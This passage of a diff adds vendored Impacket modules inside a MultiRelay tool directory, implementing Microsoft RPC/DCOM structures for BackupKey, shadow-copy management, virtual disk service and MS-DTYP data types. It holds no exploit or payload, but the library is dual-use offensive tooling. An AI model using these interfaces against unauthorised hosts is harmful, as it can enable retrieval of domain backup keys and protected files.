+# 3.1.4.1 BackuprKey(Opnum 0)
+class BackuprKey(NDRCALL):
+    opnum = 0
+    structure = (
+       ('pguidActionAgent', GUID),
+       ('pDataIn', BYTE_ARRAY),
+       ('cbDataIn', DWORD),
+       ('dwParam', DWORD),
+    )
+
+class BackuprKeyResponse(NDRCALL):
+    structure = (
+       ('ppDataOut', PBYTE_ARRAY),
+       ('pcbDataOut', DWORD),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (BackuprKey, BackuprKeyResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hBackuprKey(dce, pguidActionAgent, pDataIn, dwParam=0):
+    request = BackuprKey()
+    request['pguidActionAgent'] = pguidActionAgent
+    request['pDataIn'] = pDataIn
+    if pDataIn == NULL:
+        request['cbDataIn'] = 0
+    else:
+        request['cbDataIn'] = len(pDataIn)
+    request['dwParam'] = dwParam
+    return dce.request(request)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/init.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/init.py
@@ -0,0 +1 @@
+pass
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/comev.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/comev.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/oaut.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/oaut.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py
@@ -0,0 +1,337 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-SCMP]: Shadow Copy Management Protocol Interface implementation
+#              This was used as a way to test the DCOM runtime. Further 
+#              testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION
+from impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2
+from impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f')
+IID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772')
+IID_IVssEnumObject   = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3')
+IID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529')
+IID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696')
+IID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5')
+
+# 2.2.1.1 VSS_ID
+class VSS_ID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 2
+
+#2.2.1.2 VSS_PWSZ
+VSS_PWSZ = WSTR
+
+# 2.2.1.3 VSS_TIMESTAMP
+VSS_TIMESTAMP = LONGLONG
+
+error_status_t = LONG
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1 VSS_OBJECT_TYPE Enumeration
+class VSS_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_OBJECT_UNKNOWN      = 0
+        VSS_OBJECT_NONE         = 1
+        VSS_OBJECT_SNAPSHOT_SET = 2
+        VSS_OBJECT_SNAPSHOT     = 3
+        VSS_OBJECT_PROVIDER     = 4
+        VSS_OBJECT_TYPE_COUNT   = 5
+
+# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration
+class VSS_MGMT_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_MGMT_OBJECT_UNKNOWN     = 0
+        VSS_MGMT_OBJECT_VOLUME      = 1
+        VSS_MGMT_OBJECT_DIFF_VOLUME = 2
+        VSS_MGMT_OBJECT_DIFF_AREA   = 3
+
+# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration
+class VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM):
+    class enumItems(Enum):
+        VSS_VOLSNAP_ATTR_PERSISTENT        = 0x01
+        VSS_VOLSNAP_ATTR_NO_AUTORECOVERY   = 0x02
+        VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04
+        VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE   = 0x08
+        VSS_VOLSNAP_ATTR_NO_WRITERS        = 0x10
+
+# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration
+class VSS_SNAPSHOT_STATE(NDRENUM):
+    class enumItems(Enum):
+        VSS_SS_UNKNOWN  = 0x01
+        VSS_SS_CREATED  = 0x0c
+
+# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration
+class  VSS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_PROV_UNKNOWN  = 0
+
+# 2.2.3.7 VSS_VOLUME_PROP Structure
+class VSS_VOLUME_PROP(NDRSTRUCT):
+    structure = (
+        ('m_pwszVolumeName', VSS_PWSZ),
+        ('m_pwszVolumeDisplayName', VSS_PWSZ),
+    )
+
+# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union
+class VSS_MGMT_OBJECT_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP),
+    }
+
+# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure
+class VSS_MGMT_OBJECT_PROP(NDRSTRUCT):
+    structure = (
+        ('Type', VSS_MGMT_OBJECT_TYPE),
+        ('Obj', VSS_MGMT_OBJECT_UNION),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.3 IVssEnumMgmtObject Details
+
+# 3.1.3.1 Next (Opnum 3)
+class IVssEnumMgmtObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumMgmtObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.2.1 Next (Opnum 3)
+class IVssEnumObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+class GetProviderMgmtInterface(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('InterfaceId', VSS_ID),
+    )
+
+class GetProviderMgmtInterfaceResponse(DCOMANSWER):
+    structure = (
+       ('ppItf', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QueryVolumesSupportedForSnapshots(DCOMCALL):
+    opnum = 4
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('IContext', LONG),
+    )
+
+class QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QuerySnapshotsByVolume(DCOMCALL):
+    opnum = 5
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+       ('ProviderId', VSS_ID),
+    )
+
+class QuerySnapshotsByVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6)
+class QueryDiffAreasForVolume(DCOMCALL):
+    opnum = 6
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasForVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7)
+class QueryDiffAreasOnVolume(DCOMCALL):
+    opnum = 7
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasOnVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IVssEnumMgmtObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumMgmtObject
+
+    def Next(self, celt):
+        request = IVssEnumMgmtObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        resp = self.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssEnumObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumObject
+
+    def Next(self, celt):
+        request = IVssEnumObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        dce = self.connect()
+        resp = dce.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssSnapshotMgmt
+
+    def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt):
+        req = GetProviderMgmtInterface()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['InterfaceId'] = interfaceId
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryVolumesSupportedForSnapshots(self, providerId, iContext):
+        req = QueryVolumesSupportedForSnapshots()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['IContext'] = iContext
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target()))
+
+    def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider):
+        req = QuerySnapshotsByVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = volumeName
+        req['ProviderId'] = providerId
+        try:
+            resp = self.request(req, self._iid, uuid = self.get_iPid())
+        except DCERPCException as e:
+            print(e)
+            from impacket.winregistry import hexdump
+            data = e.get_packet()
+            hexdump(data)
+            kk = QuerySnapshotsByVolumeResponse(data)
+            kk.dump()
+        #resp.dump()
+        return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+class IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt
+
+    def QueryDiffAreasOnVolume(self, pwszVolumeName):
+        req = QueryDiffAreasOnVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryDiffAreasForVolume(self, pwszVolumeName):
+        req = QueryDiffAreasForVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py
@@ -0,0 +1,267 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-VDS]: Virtual Disk Service (VDS) Protocol
+#             This was used as a way to test the DCOM runtime. Further 
+#             testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM
+from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.enum import Enum
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')
+IID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')
+IID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')
+IID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')
+IID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')
+IID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')
+IID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')
+IID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')
+
+error_status_t = ULONG
+
+# 2.2.1.1.3 VDS_OBJECT_ID
+VDS_OBJECT_ID = GUID
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1.3.1 VDS_SERVICE_PROP
+class VDS_SERVICE_PROP(NDRSTRUCT):
+    structure = (
+        ('pwszVersion',LPWSTR),
+        ('ulFlags',ULONG),
+    )
+
+class OBJECT_ARRAY(NDRUniConformantVaryingArray):
+    item = PMInterfacePointer
+
+# 2.2.2.7.1.1 VDS_PROVIDER_TYPE
+class VDS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VDS_PT_UNKNOWN     = 0
+        VDS_PT_SOFTWARE    = 1
+        VDS_PT_HARDWARE    = 2
+        VDS_PT_VIRTUALDISK = 3
+        VDS_PT_MAX         = 4
+
+# 2.2.2.7.2.1 VDS_PROVIDER_PROP
+class VDS_PROVIDER_PROP(NDRSTRUCT):
+    structure = (
+        ('id',VDS_OBJECT_ID),
+        ('pwszName',LPWSTR),
+        ('guidVersionId',GUID),
+        ('pwszVersion',LPWSTR),
+        ('type',VDS_PROVIDER_TYPE),
+        ('ulFlags',ULONG),
+        ('ulStripeSizeFlags',ULONG),
+        ('sRebuildPriority',SHORT),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)
+class IVdsServiceInitialization_Initialize(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('pwszMachineName', LPWSTR),
+    )
+
+class IVdsServiceInitialization_InitializeResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)
+class IVdsService_IsServiceReady(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsService_IsServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)
+class IVdsService_WaitForServiceReady(DCOMCALL):
+    opnum = 4
+    structure = (
+    )
+
+class IVdsService_WaitForServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)
+class IVdsService_GetProperties(DCOMCALL):
+    opnum = 5
+    structure = (
+    )
+
+class IVdsService_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pServiceProp', VDS_SERVICE_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)
+class IVdsService_QueryProviders(DCOMCALL):
+    opnum = 6
+    structure = (
+        ('masks', DWORD),
+    )
+
+class IVdsService_QueryProvidersResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.1.1 IEnumVdsObject Interface
+# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)
+class IEnumVdsObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IEnumVdsObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('ppObjectArray', OBJECT_ARRAY),
+       ('pcFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)
+class IVdsProvider_GetProperties(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsProvider_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pProviderProp', VDS_PROVIDER_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IEnumVdsObject(IRemUnknown2):
+    def Next(self, celt=0xffff):
+        request = IEnumVdsObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+            # If it is S_FALSE(1) means less items were returned
+            if resp['ErrorCode'] != 1:
+                raise
+        interfaces = list()
+        for interface in resp['ppObjectArray']:
+            interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))
+        return interfaces
+
+class IVdsProvider(IRemUnknown2):
+    def GetProperties(self):
+        request = IVdsProvider_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsServiceInitialization(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def Initialize(self):
+        request = IVdsServiceInitialization_Initialize()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['pwszMachineName'] = '\x00'
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsService(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def IsServiceReady(self):
+        request = IVdsService_IsServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+        return resp 
+
+    def WaitForServiceReady(self):
+        request = IVdsService_WaitForServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def GetProperties(self):
+        request = IVdsService_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def QueryProviders(self, masks):
+        request = IVdsService_QueryProviders()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['masks'] = masks
+        resp = self.request(request, uuid = self.get_iPid())
+        return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/wmi.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dhcpm.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dhcpm.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/drsuapi.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py
@@ -0,0 +1,542 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-DTYP] Interface mini implementation
+#
+from __future__ import division
+from __future__ import print_function
+from struct import pack
+from six import binary_type
+
+from impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \
+    NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \
+    NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL
+
+DWORD = NDRULONG
+BOOL = NDRULONG
+UCHAR = NDRUSMALL
+SHORT = NDRSHORT
+NULL = NULL
+
+class LPDWORD(NDRPOINTER):
+    referent = (
+        ('Data', DWORD),
+    )
+
+class PSHORT(NDRPOINTER):
+    referent = (
+        ('Data', SHORT),
+    )
+
+class PBOOL(NDRPOINTER):
+    referent = (
+        ('Data', BOOL),
+    )
+
+class LPBYTE(NDRPOINTER):
+    referent = (
+        ('Data', NDRUniConformantArray),
+    )
+PBYTE = LPBYTE
+
+# 2.2.4 BOOLEAN
+BOOLEAN = NDRBOOLEAN
+
+# 2.2.6 BYTE
+BYTE = NDRUSMALL
+
+# 2.2.7 CHAR
+CHAR = NDRSMALL
+class PCHAR(NDRPOINTER):
+    referent = (
+        ('Data', CHAR),
+    )
+
+class WIDESTR(NDRUniFixedArray):
+    def getDataLen(self, data, offset=0):
+        return data.find(b'\x00\x00\x00', offset)+3-offset
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class STR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                if not isinstance(value, binary_type):
+                    self.fields[key] = value.encode('utf-8')
+                else:
+                    # if it is a binary type (str in Python 2, bytes in Python 3), then we assume it is a raw buffer
+                    self.fields[key] = value
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-8')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            try:
+                return self.fields[key].decode('utf-8')
+            except UnicodeDecodeError:
+                # if we could't decode it, we assume it is a raw buffer
+                return self.fields[key]
+        else:
+            return NDR.__getitem__(self,key)
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]
+
+class LPSTR(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class WSTR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)//2'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)//2'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)//2'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)//2'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]*2 
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class LPWSTR(NDRPOINTER):
+    referent = (
+        ('Data', WSTR),
+    )
+
+# 2.2.5 BSTR
+BSTR = LPWSTR
+
+# 2.2.8 DOUBLE
+DOUBLE = NDRDOUBLEFLOAT
+class PDOUBLE(NDRPOINTER):
+    referent = (
+        ('Data', DOUBLE),
+    )
+
+# 2.2.15 FLOAT
+FLOAT = NDRFLOAT
+class PFLOAT(NDRPOINTER):
